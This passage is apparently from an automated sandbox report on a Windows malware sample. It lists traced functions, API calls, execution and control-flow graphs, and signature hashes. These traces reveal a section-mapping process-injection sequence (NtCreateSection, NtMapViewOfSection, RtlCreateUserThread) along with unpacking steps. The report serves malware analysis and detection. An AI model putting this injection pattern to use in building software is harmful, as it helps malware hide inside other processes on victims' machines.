                                                                                                                            • LocalAlloc.KERNELBASE(00000000,004F23DC,00415CD5), ref: 00415658
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: 137ac3f92e9acb2c5fa584936085e74bc0c1da4fc1e5443efff9116a182976be
                                                                                                                            • Instruction ID: 5e48a04f9e11dcc7131419058854abdc843f7e17987eb29baea089ef08641d0b
                                                                                                                            • Opcode Fuzzy Hash: 137ac3f92e9acb2c5fa584936085e74bc0c1da4fc1e5443efff9116a182976be
                                                                                                                            • Instruction Fuzzy Hash: 79B092B05421009FE200CB60AE04B203AA8E308202F018461B904C21A0D6B14410CA28

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00401E65 Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                                                                            • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                                                                                            • Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                                                                            • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90
                                                                                                                            Function 00415850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBW.KERNEL32(00000000,?), ref: 0041587D
                                                                                                                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004158C1
                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004158D2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCalendarCommInfoNamePathShort
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 1570861727-2547889144
                                                                                                                            • Opcode ID: bc17eb0377387f5bad20137c454eddc6c6d7c052231a44a3ecaa76dbaeee760d
                                                                                                                            • Instruction ID: 75a0542c090a1048562518fe0c410909b3098a1f030c9eacbf9327c34c692846
                                                                                                                            • Opcode Fuzzy Hash: bc17eb0377387f5bad20137c454eddc6c6d7c052231a44a3ecaa76dbaeee760d
                                                                                                                            • Instruction Fuzzy Hash: 3A11C630940204DAD760EF64DC81BED7BF4FB48310F5181B9E588AA1C0CE745AD98B99
                                                                                                                            Function 00415910 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415944
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041595F
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 0041597E
                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415986
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 367530164-0
                                                                                                                            • Opcode ID: 97ff363394a7b784a3dec45dcbe4e62a596ef6cbb787102fc82400f029e94037
                                                                                                                            • Instruction ID: c5ece5b07aa489753bf58a5f8e8b67b970329aa906d251dcea3a70d9a670a326
                                                                                                                            • Opcode Fuzzy Hash: 97ff363394a7b784a3dec45dcbe4e62a596ef6cbb787102fc82400f029e94037
                                                                                                                            • Instruction Fuzzy Hash: BE01DBB0650108DFD710EB64ED457EA37A8E70C316F414436F609D7291DAB45D94CF5E

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:16.5%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:176
                                                                                                                            Total number of Limit Nodes:8
                                                                                                                            execution_graph 3886 4019c0 3887 4019c8 3886->3887 3888 4019e7 3886->3888 3889 401a29 Sleep 3888->3889 3890 4014fb 7 API calls 3889->3890 3891 401a44 3890->3891 3892 4015fb 7 API calls 3891->3892 3893 401a55 3891->3893 3892->3893 3605 415e00 3608 4159a0 3605->3608 3607 415e05 3609 4159ad 3608->3609 3610 415bb6 3609->3610 3611 415aaf InterlockedCompareExchange ReadConsoleA FindAtomA GetConsoleMode SearchPathA 3609->3611 3612 415bc4 SetCommState 3610->3612 3616 415bdd 3610->3616 3613 415b09 6 API calls 3611->3613 3612->3610 3614 415ba7 3613->3614 3615 415b9e ReleaseSemaphore 3613->3615 3614->3610 3615->3614 3617 415cd0 3616->3617 3618 415bea 9 API calls 3616->3618 3629 415650 LocalAlloc 3617->3629 3625 415ca7 3618->3625 3622 415cd5 LoadLibraryW 3630 415680 GetModuleHandleW GetProcAddress VirtualProtect 3622->3630 3623 415d2d 3631 415910 3623->3631 3625->3617 3626 415d32 3627 415d6d InterlockedDecrement 3626->3627 3628 415d83 3626->3628 3627->3626 3628->3607 3629->3622 3630->3623 3632 415939 QueryDosDeviceA 3631->3632 3633 41594a 3631->3633 3632->3633 3642 415810 3633->3642 3636 415965 3645 415850 3636->3645 3637 41595d FreeEnvironmentStringsW 3637->3636 3640 41598c 3640->3626 3641 41597c HeapDestroy GetNumaHighestNodeNumber 3641->3640 3643 415821 FatalAppExitA GetModuleHandleW 3642->3643 3644 415833 3642->3644 3643->3644 3644->3636 3644->3637 3646 415883 3645->3646 3647 415874 BuildCommDCBW 3645->3647 3649 4158b9 SetCalendarInfoW GetShortPathNameW 3646->3649 3650 4158dd 3646->3650 3651 415840 3646->3651 3647->3646 3649->3646 3650->3640 3650->3641 3654 4157d0 3651->3654 3655 4157f9 3654->3655 3656 4157ec ResetEvent 3654->3656 3655->3646 3656->3655 3828 402f42 3830 402f18 3828->3830 3829 4019e0 15 API calls 3831 40304f 3829->3831 3830->3829 3830->3831 3844 403103 3845 403246 3844->3845 3846 40312d 3844->3846 3846->3845 3847 4031f0 RtlCreateUserThread NtTerminateProcess 3846->3847 3847->3845 3752 401606 3752->3752 3753 401609 3752->3753 3754 4016af NtDuplicateObject 3753->3754 3763 4017cb 3753->3763 3755 4016cc NtCreateSection 3754->3755 3754->3763 3756 4016f2 NtMapViewOfSection 3755->3756 3757 40174c NtCreateSection 3755->3757 3756->3757 3758 401715 NtMapViewOfSection 3756->3758 3759 401778 3757->3759 3757->3763 3758->3757 3760 401733 3758->3760 3761 401782 NtMapViewOfSection 3759->3761 3759->3763 3760->3757 3762 4017a9 NtMapViewOfSection 3761->3762 3761->3763 3762->3763 3848 60092b GetPEB 3849 600972 3848->3849 3764 401613 3765 40161c 3764->3765 3766 4016af NtDuplicateObject 3765->3766 3775 4017cb 3765->3775 3767 4016cc NtCreateSection 3766->3767 3766->3775 3768 4016f2 NtMapViewOfSection 3767->3768 3769 40174c NtCreateSection 3767->3769 3768->3769 3770 401715 NtMapViewOfSection 3768->3770 3771 401778 3769->3771 3769->3775 3770->3769 3772 401733 3770->3772 3773 401782 NtMapViewOfSection 3771->3773 3771->3775 3772->3769 3774 4017a9 NtMapViewOfSection 3773->3774 3773->3775 3774->3775 3657 403257 3658 4031f0 RtlCreateUserThread NtTerminateProcess 3657->3658 3659 403261 3657->3659 3660 403246 3658->3660 3802 402ed9 3803 402e8d 3802->3803 3803->3802 3804 4019e0 15 API calls 3803->3804 3805 40304f 3803->3805 3804->3805 3679 60003c 3680 600049 3679->3680 3692 600e0f SetErrorMode SetErrorMode 3680->3692 3685 600265 3686 6002ce VirtualProtect 3685->3686 3688 60030b 3686->3688 3687 600439 VirtualFree 3691 6004be LoadLibraryA 3687->3691 3688->3687 3690 6008c7 3691->3690 3693 600223 3692->3693 3694 600d90 3693->3694 3695 600dad 3694->3695 3696 600238 VirtualAlloc 3695->3696 3697 600dbb GetPEB 3695->3697 3696->3685 3697->3696 3661 74645e 3664 74646a 3661->3664 3665 746479 3664->3665 3668 746c0a 3665->3668 3670 746c25 3668->3670 3669 746c2e CreateToolhelp32Snapshot 3669->3670 3671 746c4a Module32First 3669->3671 3670->3669 3670->3671 3672 746469 3671->3672 3673 746c59 3671->3673 3675 7468c9 3673->3675 3676 7468f4 3675->3676 3677 746905 VirtualAlloc 3676->3677 3678 74693d 3676->3678 3677->3678 3678->3678 3894 4019eb 3895 4019f0 3894->3895 3896 401a29 Sleep 3895->3896 3897 4014fb 7 API calls 3896->3897 3898 401a44 3897->3898 3899 401a55 3898->3899 3900 4015fb 7 API calls 3898->3900 3900->3899 3806 415cf4 3807 415d00 LoadLibraryW 3806->3807 3815 415680 GetModuleHandleW GetProcAddress VirtualProtect 3807->3815 3810 415d2d 3811 415910 10 API calls 3810->3811 3812 415d32 3811->3812 3813 415d6d InterlockedDecrement 3812->3813 3814 415d83 3812->3814 3813->3812 3815->3810 3816 4014fa 3826 40150c 3816->3826 3817 4016af NtDuplicateObject 3818 4016cc NtCreateSection 3817->3818 3827 4015ea 3817->3827 3819 4016f2 NtMapViewOfSection 3818->3819 3820 40174c NtCreateSection 3818->3820 3819->3820 3821 401715 NtMapViewOfSection 3819->3821 3822 401778 3820->3822 3820->3827 3821->3820 3823 401733 3821->3823 3824 401782 NtMapViewOfSection 3822->3824 3822->3827 3823->3820 3825 4017a9 NtMapViewOfSection 3824->3825 3824->3827 3825->3827 3826->3817 3826->3827 3698 402fbe 3700 402fc3 3698->3700 3699 40304f 3700->3699 3702 4019e0 3700->3702 3703 4019e7 3702->3703 3704 401a29 Sleep 3703->3704 3709 4014fb 3704->3709 3706 401a44 3708 401a55 3706->3708 3721 4015fb 3706->3721 3708->3699 3710 40150c 3709->3710 3711 4016af NtDuplicateObject 3710->3711 3720 4015ea 3710->3720 3712 4016cc NtCreateSection 3711->3712 3711->3720 3713 4016f2 NtMapViewOfSection 3712->3713 3714 40174c NtCreateSection 3712->3714 3713->3714 3715 401715 NtMapViewOfSection 3713->3715 3716 401778 3714->3716 3714->3720 3715->3714 3717 401733 3715->3717 3718 401782 NtMapViewOfSection 3716->3718 3716->3720 3717->3714 3719 4017a9 NtMapViewOfSection 3718->3719 3718->3720 3719->3720 3720->3706 3722 40160b 3721->3722 3723 4016af NtDuplicateObject 3722->3723 3732 4017cb 3722->3732 3724 4016cc NtCreateSection 3723->3724 3723->3732 3725 4016f2 NtMapViewOfSection 3724->3725 3726 40174c NtCreateSection 3724->3726 3725->3726 3727 401715 NtMapViewOfSection 3725->3727 3728 401778 3726->3728 3726->3732 3727->3726 3729 401733 3727->3729 3730 401782 NtMapViewOfSection 3728->3730 3728->3732 3729->3726 3731 4017a9 NtMapViewOfSection 3730->3731 3730->3732 3731->3732 3732->3708

                                                                                                                            Executed Functions

                                                                                                                            Function 004159A0 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 309timefilepipeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 4159a0-4159c8 2 4159d0-4159d7 0->2 3 415a04-415a0a 2->3 4 4159d9-415a00 2->4 5 415a0c-415a18 3->5 6 415a1e-415a28 3->6 4->3 5->6 7 415a63-415a6a 6->7 8 415a2a-415a59 6->8 7->2 9 415a70-415a76 7->9 8->7 11 415a78-415a7e 9->11 12 415a80-415a86 11->12 13 415a8c-415a93 11->13 12->13 14 415a95 13->14 15 415a99-415aa0 13->15 14->15 15->11 16 415aa2-415aa9 15->16 17 415bb6-415bc2 16->17 18 415aaf-415b9c InterlockedCompareExchange ReadConsoleA FindAtomA GetConsoleMode SearchPathA GetDefaultCommConfigA CopyFileW ConnectNamedPipe ReadConsoleOutputW GetModuleFileNameW GetSystemTimeAdjustment 16->18 19 415bc4-415bd2 SetCommState 17->19 22 415ba7-415bb3 18->22 23 415b9e-415ba1 ReleaseSemaphore 18->23 24 415bd4-415bdb 19->24 25 415bdd-415be4 19->25 22->17 23->22 24->19 24->25 26 415cd0-415cdf call 415650 25->26 27 415bea-415cca GetConsoleAliasesLengthA GetComputerNameW GetTimeFormatA GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryTypeW FormatMessageA GetLongPathNameA GetCommState 25->27 33 415ce1-415cf2 26->33 34 415d1d-415d28 LoadLibraryW call 415680 26->34 27->26 35 415d00-415d10 33->35 40 415d2d-415d3e call 415910 34->40 38 415d12 35->38 39 415d18-415d1b 35->39 38->39 39->34 39->35 45 415d40-415d47 40->45 46 415d57-415d5d 45->46 47 415d49-415d53 45->47 48 415d64-415d6b 46->48 49 415d5f call 415670 46->49 47->46 52 415d7a-415d81 48->52 53 415d6d-415d74 InterlockedDecrement 48->53 49->48 52->45 55 415d83-415d93 52->55 53->52 57 415da0-415db0 55->57 58 415db2 57->58 59 415db9-415dbc 57->59 58->59 59->57 60 415dbe-415dc9 59->60 61 415dd0-415dd5 60->61 62 415dd7-415ddd 61->62 63 415ddf-415de5 61->63 62->63 64 415de7-415df4 62->64 63->61 63->64
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415ABA
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415AC7
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00415ACE
                                                                                                                            • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415AD6
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415AEE
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415B15
                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00415B1E
                                                                                                                            • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00415B32
                                                                                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415B77
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00415B86
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415B8F
                                                                                                                            • ReleaseSemaphore.KERNEL32(00000000,00000000,00000000), ref: 00415BA1
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415BC8
                                                                                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415BF9
                                                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415C0D
                                                                                                                            • GetTimeFormatA.KERNEL32(00000000,00000000,?,00417314,?,00000000), ref: 00415C4D
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415C54
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00415C5A
                                                                                                                            • GetBinaryTypeW.KERNEL32(00417334,?), ref: 00415C6C
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00415C7F
                                                                                                                            • GetLongPathNameA.KERNEL32(00417364,?,00000000), ref: 00415C92
                                                                                                                            • GetCommState.KERNEL32(00000000,00000000), ref: 00415C9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040451216.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Console$CommFileName$FormatLengthPathReadStateTime$AdjustmentAliasAliasesAtomAttributesBinaryCompareComputerConfigConnectCopyDefaultExchangeExesFindInterlockedLongMessageModeModuleNamedOutputPipeReleaseSearchSemaphoreSystemType
                                                                                                                            • String ID: @3#v$P4#vp^5w$k`$}$
                                                                                                                            • API String ID: 3800548968-402751238
                                                                                                                            • Opcode ID: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction ID: b74f69d15b1c00e371bae04283b2e7407a3b84b28a54ffdc86722d59f2fd5859
                                                                                                                            • Opcode Fuzzy Hash: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction Fuzzy Hash: 6CB11671841528EBD725DB61DC48EEF7B78EF49350F0180AAF609A2150DB789AC1CFAD
                                                                                                                            Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 151 4014fb-401504 152 40151b 151->152 153 40150c-40152e 151->153 152->153 158 401531-401545 call 40127e 153->158 163 40154a-401555 158->163 163->163 164 401558-40155a 163->164 165 40155d-401572 164->165 168 401574-401579 165->168 170 4015c4 168->170 171 40157b 168->171 172 4015c6 170->172 173 40162f-401632 170->173 174 4015f6-4015f8 171->174 175 40157d-40159a 171->175 172->168 176 4015c8-4015cd 172->176 177 401634-401659 call 40127e 173->177 178 4016a5-4016a6 173->178 185 40159d 175->185 186 40152f-401530 175->186 181 401648-401659 176->181 182 4015cf-4015d0 176->182 191 40165b 177->191 192 40165e-401663 177->192 183 4016a7-4016a9 178->183 184 40162d 178->184 181->191 181->192 193 4015d2-4015e8 182->193 194 4015b6-4015b9 182->194 189 401987 183->189 190 4016af-4016c6 NtDuplicateObject 183->190 184->173 185->165 187 40159f-4015a1 185->187 186->158 195 4015a3 187->195 196 40161c 187->196 197 401996-4019dd call 40127e 189->197 190->189 198 4016cc-4016f0 NtCreateSection 190->198 191->192 215 401989-401991 192->215 216 401669-40167a 192->216 201 4015ea-4015f5 193->201 202 40157c 193->202 194->177 200 4015bb-4015c3 194->200 203 40161e-40162c 195->203 204 4015a5-4015a6 195->204 196->203 206 4016f2-401713 NtMapViewOfSection 198->206 207 40174c-401772 NtCreateSection 198->207 200->170 201->174 202->175 210 4015a9-4015b4 202->210 203->177 217 401643 203->217 204->210 206->207 213 401715-401731 NtMapViewOfSection 206->213 207->189 214 401778-40177c 207->214 210->194 213->207 219 401733-401749 213->219 214->189 220 401782-4017a3 NtMapViewOfSection 214->220 215->192 215->197 216->189 228 401680-4016a3 216->228 217->177 219->207 220->189 222 4017a9-4017c5 NtMapViewOfSection 220->222 222->189 227 4017cb call 4017d0 222->227 228->183
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                            • Opcode Fuzzy Hash: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A
                                                                                                                            Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 237 4015fb-401604 238 401615 237->238 239 40160b-401611 237->239 238->239 240 401618-40162c 238->240 239->240 244 401643 240->244 245 401634-401659 call 40127e 240->245 244->245 250 40165b 245->250 251 40165e-401663 245->251 250->251 253 401989-401991 251->253 254 401669-40167a 251->254 253->251 259 401996-4019dd call 40127e 253->259 257 401680-4016a9 254->257 258 401987 254->258 257->258 266 4016af-4016c6 NtDuplicateObject 257->266 258->259 266->258 268 4016cc-4016f0 NtCreateSection 266->268 270 4016f2-401713 NtMapViewOfSection 268->270 271 40174c-401772 NtCreateSection 268->271 270->271 273 401715-401731 NtMapViewOfSection 270->273 271->258 274 401778-40177c 271->274 273->271 276 401733-401749 273->276 274->258 278 401782-4017a3 NtMapViewOfSection 274->278 276->271 278->258 280 4017a9-4017c5 NtMapViewOfSection 278->280 280->258 283 4017cb call 4017d0 280->283
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                            • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64
                                                                                                                            Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 285 401613-40162c 289 401643 285->289 290 401634-401659 call 40127e 285->290 289->290 295 40165b 290->295 296 40165e-401663 290->296 295->296 298 401989-401991 296->298 299 401669-40167a 296->299 298->296 304 401996-4019dd call 40127e 298->304 302 401680-4016a9 299->302 303 401987 299->303 302->303 311 4016af-4016c6 NtDuplicateObject 302->311 303->304 311->303 313 4016cc-4016f0 NtCreateSection 311->313 315 4016f2-401713 NtMapViewOfSection 313->315 316 40174c-401772 NtCreateSection 313->316 315->316 318 401715-401731 NtMapViewOfSection 315->318 316->303 319 401778-40177c 316->319 318->316 321 401733-401749 318->321 319->303 323 401782-4017a3 NtMapViewOfSection 319->323 321->316 323->303 325 4017a9-4017c5 NtMapViewOfSection 323->325 325->303 328 4017cb call 4017d0 325->328
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                            • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64
                                                                                                                            Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 330 401606-401607 330->330 331 401609 330->331 332 40160b-40162c 331->332 333 40163c-401659 call 40127e 331->333 343 401643 332->343 344 401634-401639 332->344 341 40165b 333->341 342 40165e-401663 333->342 341->342 346 401989-401991 342->346 347 401669-40167a 342->347 343->344 344->333 346->342 352 401996-4019dd call 40127e 346->352 350 401680-4016a9 347->350 351 401987 347->351 350->351 359 4016af-4016c6 NtDuplicateObject 350->359 351->352 359->351 361 4016cc-4016f0 NtCreateSection 359->361 363 4016f2-401713 NtMapViewOfSection 361->363 364 40174c-401772 NtCreateSection 361->364 363->364 366 401715-401731 NtMapViewOfSection 363->366 364->351 367 401778-40177c 364->367 366->364 369 401733-401749 366->369 367->351 371 401782-4017a3 NtMapViewOfSection 367->371 369->364 371->351 373 4017a9-4017c5 NtMapViewOfSection 371->373 373->351 376 4017cb call 4017d0 373->376
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3040414708.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_uegasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                            • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64
                                                                                                                            Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
